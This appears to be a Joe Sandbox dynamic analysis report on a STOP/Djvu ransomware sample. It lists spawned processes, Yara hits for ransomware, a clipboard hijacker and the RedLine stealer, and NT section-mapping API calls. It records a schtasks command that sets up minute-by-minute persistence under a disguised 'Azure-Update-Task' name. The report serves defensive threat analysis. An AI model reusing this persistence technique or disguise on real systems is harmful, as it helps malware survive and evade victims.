Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001D.00000002.1908200687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	17:49:19
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe"
Imagebase:	0x400000
File size:	306'688 bytes
MD5 hash:	41B883A061C95E9B9CB17D4CA50DE770
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000001E.00000002.1943856985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	17:49:20
Start date:	04/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Imagebase:	0x9d0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	17:49:20
Start date:	04/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	17:49:22
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Imagebase:	0x400000
File size:	306'688 bytes
MD5 hash:	41B883A061C95E9B9CB17D4CA50DE770
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker, Description: Yara detected Clipboard Hijacker, Source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000021.00000002.2169316738.0000000000920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.2170422232.0000000000A0C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 87%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	17:49:22
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000022.00000002.1999924732.0000000004827000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000022.00000002.2000374378.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	17:49:23
Start date:	04/04/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3968 -s 11016
Imagebase:	0x7ff70bc10000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	17:49:24
Start date:	04/04/2024
Path:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
Imagebase:	0x400000
File size:	734'208 bytes
MD5 hash:	B925392616A0AD9C3FCDE0F5BD7EF7A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	17:49:25
Start date:	04/04/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff609fd0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	51.9%
Signature Coverage:	42.3%
Total number of Nodes:	52
Total number of Limit Nodes:	3

Executed Functions

Function 0040156B Relevance: 10.7, APIs: 7, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction ID: 4068bc8a221ecf0939acbdb1e7e88c7e46ae7771e33a0dc799c943c57428cfd7
Opcode Fuzzy Hash: 9c550399e78a4170f2f5d29d07dc02536ee10777f5cb6a9f829c2ebd2296549f
Instruction Fuzzy Hash: AC717CB4900205BFDB209F91CC48F9BBFB8FF96710F14416AFA52BA2E5D6749901CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 206
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction ID: 31d3dea579921dc9a2cae9d470b126ee15754b3dfc7efa49c87a4de0449774b7
Opcode Fuzzy Hash: 3e181e0f091291a7bcc65ea4cbb03b61709e80b03e4eaee54da447a390a899e9
Instruction Fuzzy Hash: 3D615EB4900205FBEF209F95CC49FAF7BB8EF81700F14412AFA52BA1E4D6759901DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401603 Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction ID: 0ca0715bd940020d1e7da968824c045868daa20d03b9e32912d168e5fb042320
Opcode Fuzzy Hash: b15bfa31299a4de99dc5fbb09a0d922efddb8920de5fe92507006c0b369db749
Instruction Fuzzy Hash: 21513AB4900245BFEF209F91CC48FAB7BB8EF86700F144159FA11BA1A5D6759901CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015E0 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction ID: f8a4b5919756d8021f5b889f0f58571870373b5bf4bcbac62585d3645815d21d
Opcode Fuzzy Hash: 04eb20433b5860dced4f30358d53dad77e0caca42b63522b0a9d39180673331f
Instruction Fuzzy Hash: 1D512AB4900245BFEF209F91CC48FAB7BB8EF85B00F14416AFA11BA1A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015F1 Relevance: 10.7, APIs: 7, Instructions: 177
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction ID: 5a7ae9765c1c855b3f83e93a3bcaaff71aa811e3383dbed8b01ddf0fe81d9004
Opcode Fuzzy Hash: 33ac70b5b43b6acd6d344138c7c65f11e9e4a1672503bef4bbae75314ef4305b
Instruction Fuzzy Hash: CD512AB4900205BBEF209F91CC49FAB7BB8EF85B00F14412AFA11BA1E5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015F5 Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction ID: 051afd1cfa3f53c1d66a227bdc9b807376e364d6cbb67a4c48344ec6a8846052
Opcode Fuzzy Hash: 093e4af39a6e9b280214902670a608798f3f560288f35baa23b2d456886eb4a6
Instruction Fuzzy Hash: A5512AB4900205BFEF209F91CC48FAF7BB8EF85B00F144169FA11BA1E5D6759941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015F8 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
Instruction ID: 3f624420ec53c22d9d437f9961cb7ed2e3b3007a845c559fed4a58de007b3d88
Opcode Fuzzy Hash: 49cdd7e1c93eceed419c410d8f1c7ea39d36b456fb8bebdc5244cfb81669af5b
Instruction Fuzzy Hash: 105129B4900245BFEF209F91CC48FEBBFB8EF86B10F140159FA11BA2A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040161A Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401746
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction ID: 888905ccdc062b2077a5f017d1ef169053418d2c42f3064abdaebd709c3a76db
Opcode Fuzzy Hash: 0d93f4365e87c5b399d537d4dae1489dcabe6451f020ac4fa5379885d57b3e5a
Instruction Fuzzy Hash: B15107B4900209BFEF209F91CC48FABBBB8EF85B10F104159FA11BA2A5D6759945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 02F5B7F7 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02F5B81F
Module32First.KERNEL32(00000000,00000224), ref: 02F5B83F

Memory Dump Source

Source File: 00000000.00000002.1443372000.0000000002F58000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f58000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 13deb7e1b7f2bbe90a347ab88b190a7f2decea89eebde73ceb43cbe4eab51c52
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: CEF0F6355007206BD7203BF4DC8CF6E72E8AF4866DF141528EB42910C0CB78E8068B60

Uniqueness

Uniqueness Score: -1.00%

Function 004017DF Relevance: 3.0, APIs: 2, Instructions: 30
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401705
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401777
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401799

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction ID: 8378ec888cbfd114d089a1c3a957c728448429fa8b00b4fa6dff980078d78902
Opcode Fuzzy Hash: 778a8056d619d0b7cace1ce49ed5d27e35b0d83fcb1ff79323e202117ad148a0
Instruction Fuzzy Hash: 83F03975510240BEEF245E92CC88FAB3FBDEFC6B10B14012EF951A51E5E2358C00DB20

Uniqueness

Uniqueness Score: -1.00%

Function 02CF003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CF024D

Strings

cess, xrefs: 02CF018D
kernel32.dll, xrefs: 02CF008F, 02CF0095

Memory Dump Source

Source File: 00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f52d848a7eb621d3bcf27de12283cb4e466daf3c2a9a7caa30bfd242752cbc5a
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 83525B74A01229DFDBA4CF58C984BACBBB1BF09314F1480D9E54DAB356DB30AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02CF0223,?,?), ref: 02CF0E19
SetErrorMode.KERNELBASE(00000000,?,?,02CF0223,?,?), ref: 02CF0E1E

Memory Dump Source

Source File: 00000000.00000002.1443176232.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f40b6a7c0d257f705cb0e7d4435728bf201dbb2aa5362d75ca5dd7b1c55b98c4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 97D01231545128B7D7402A94DC09BCD7B1CDF05B66F008011FB0DD9081C770964046E5

Uniqueness

Uniqueness Score: -1.00%

Function 004019B2 Relevance: 1.3, APIs: 1, Instructions: 65
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction ID: 9535be6c36f98077632f4f02dfbdda9f19971c7bea6acc9325b6b8c563985b13
Opcode Fuzzy Hash: 04f6897abb308126f470fd05014cf238183fa8e61674ddeb0717af411a121877
Instruction Fuzzy Hash: CD119EB530C204F7DB00AA959C92EBA32689B40754F304537F607B90F0E67D9A13EB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019CC Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction ID: 9860b3adbb02253c11ca7fee9fca2776f08e165eea76d4ff876d2c90885662b8
Opcode Fuzzy Hash: 33c28c6db8310be9d0036b491102ae5ea51f8e5c4e2b4487472b9c1eca0431ce
Instruction Fuzzy Hash: FD017C7630C204F7DB00AA819892EBA32649B40754F304577F607B90F0D63D9A13EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 004019BE Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction ID: 6ea748b5703c6c3cc47f97f8384fa15d7aaa85e5df960e900962d61b5b42e5e1
Opcode Fuzzy Hash: a7c3ad1862dbfc6de84a841be9cc81f89f6a2c5f1f8df06033d8068c45b7fee5
Instruction Fuzzy Hash: 20018E7630C204F7DB00AA819C92EBA32645B44754F204577F607B90F0D67D9A13EB1B

Uniqueness

Uniqueness Score: -1.00%

Function 004019CF Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A04

Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401697
Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016C4

Memory Dump Source

Source File: 00000000.00000002.1441861352.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction ID: 1dabb258173db235a1d95cfc95eeffc66b9799adec5ca63ac31477e601607a68
Opcode Fuzzy Hash: 0cae673df1dcccc298252c6cb1d087753a000ea560dbf3a75727c984865d924c
Instruction Fuzzy Hash: 7701D675308204F7DB00ABD08C81AAE32689F40314F708177F613B81F0EA3D8612EB5B

Uniqueness

Uniqueness Score: -1.00%

Function 02F5B4B6 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

